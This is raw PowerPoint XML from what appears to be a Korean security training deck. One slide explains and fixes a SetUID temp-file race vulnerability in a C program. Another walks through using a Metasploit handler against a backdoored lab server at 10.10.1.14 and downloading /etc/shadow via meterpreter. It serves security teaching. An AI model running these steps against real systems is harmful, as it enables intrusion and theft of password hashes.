                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F95F58D-1CE5-4E34-A5F2-F1049E4E4D1C}"/>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878EAB9E-1E26-41A0-8192-7DC47D6D675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1AD2403-EA51-4597-9B6C-5BA6B096B9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8" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{131CC4FD-9F78-4686-B8FE-6E23511C56C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7118901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7D80079-A11C-43EE-9972-D3F4784D0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시스템은 임시 파일을 간편하게 생성하기 위해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하지만 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대해 취약점을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해소하시오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 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C368EF7A-92D1-4A91-81D9-5D26FFC48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B6DCF83-117F-4AE4-9EA9-30C83997164A}"/>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   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5CC42FDF-5869-4AED-8491-8D923280D19D}"/>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920B5FD6-6171-46A1-B1F9-896664A6F0F8}"/>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C070845F-0B2E-4ECF-9421-4008703FCE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7763094-5A83-47D7-820A-3B67422636A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23" name="그룹 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C830D1E0-CD72-468E-A4A1-E8E4D56EC297}"/>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70347296-C5B3-46CB-9C9D-EBEF8AA4E4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93A0A3B-518D-4E0C-96A5-E9AE75449CA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F3EF9C77-CDC2-433F-A50D-1B1EE098C2B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24221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–l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/createTempFile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createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>vi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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 후 다시 파일을 추가하는 취약점으로 권한 상승에 이용될 수 있음</a:t>
            </a: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취약한 부분 수정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>fopen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>옵션 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(“a” → “w”)</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91166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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) createTempFile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createTempFile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SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>부여</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dirty="0" err="1"/>
              <a:t>u+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> createTempFile</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 155">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C86DE2-5CFF-4922-B74D-3E79D49FC314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479425" y="1100666"/>
            <a:ext cx="5135880" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 157">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AE325C-E7D5-42AF-837C-9CF57E2E09E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1582" t="895" r="753" b="540"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479425" y="2190750"/>
            <a:ext cx="4705350" cy="2565400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 159">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C1EB702-DA42-4AD4-A5CE-03B8D959BB39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1365" t="-19" r="821" b="460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="466726"/>
            <a:ext cx="4891087" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 161">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A719016-8296-4BCE-A732-C7DB8945926F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1614" t="13375" r="936" b="78042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="3671888"/>
            <a:ext cx="4891087" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 163">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7AC04FE-A749-43E7-A9DD-F9FF82E99ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="1765" t="13945" r="1303" b="65179"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="4491036"/>
            <a:ext cx="4826191" cy="666751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D94F8C23-D2DC-409F-BC4C-A9AA10E30E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5378388"/>
            <a:ext cx="5616792" cy="111061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B2AFB936-0A16-4472-839D-C4CB7491020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68F39187-2D63-4909-952A-85B228F6439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7DC04A2-D093-454A-BE2C-5B5CC2AF62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0E2DF4-7AFB-4C86-BD31-B9083CEBE1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8372023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msfconsole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구동하시오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3253E594-46B0-4F56-9E17-B8E287BBB07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12BCA785-13BB-4EE4-ABCA-83F32969B08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D33AD7B-4837-4FA9-8659-7386F4BC210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6DAAD83-1583-41A3-AEC7-F625E9D17D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4428230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서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ifconfig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Metasploit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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>use exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt; use exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/handler</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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>show options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&gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 167">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E295136F-BC83-41C3-8CA1-CCEBAC773E26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568960" y="1062566"/>
            <a:ext cx="4922647" cy="2972181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA368846-64C5-4769-92E1-E1A20DD21B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="645161" y="4560146"/>
            <a:ext cx="1474084" cy="736869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 171">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99680F7B-188C-480E-B4BA-66C2B9E08F1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2260539" y="4352903"/>
            <a:ext cx="3512349" cy="1868328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 173">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD3A009-4181-4981-8B27-BC0B311D94D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="50" t="87424" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="944880"/>
            <a:ext cx="4992624" cy="351366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 175">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE44FFD-315F-4697-AF6C-1E6DF9EB9E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect l="53" t="88153" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321334" y="1993011"/>
            <a:ext cx="4992624" cy="351366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 177">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974ED12D-E9DE-45FC-AE82-FACB25C0D690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324382" y="3041142"/>
            <a:ext cx="4989576" cy="2984373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="그룹 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{453B9FDD-5049-4ED0-8488-FF305F42FF6D}"/>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3F814EA6-6372-4935-B64B-63917BF26F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33D6315-16A4-423C-B9F6-F5C5F4452C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81BFEB44-4EE0-4901-9C27-1B68FC72326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040050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RHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 백도어가 실행 중인 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력 및 공격 실행</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RHOST 10.10.1.14 </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exploit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명령어 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt; ls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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>download /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow</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11334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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter &gt; exit</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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># cat shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 179">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C3BCA3-9BB8-4337-B5CF-B403A753F283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1" t="49926" r="168"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485141" y="1173480"/>
            <a:ext cx="4894580" cy="1479253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 181">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{891A50A9-8CB4-4BBE-980C-FBD922DBB5FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1" t="57835" r="-34"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485141" y="3261360"/>
            <a:ext cx="4981586" cy="1253066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 183">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F17DDB-A907-4B63-9349-AC559CF79CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="84372" r="-587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514235" y="5224401"/>
            <a:ext cx="4981586" cy="460119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 185">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6063D546-AB04-4D65-9C36-C2817EA9E7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
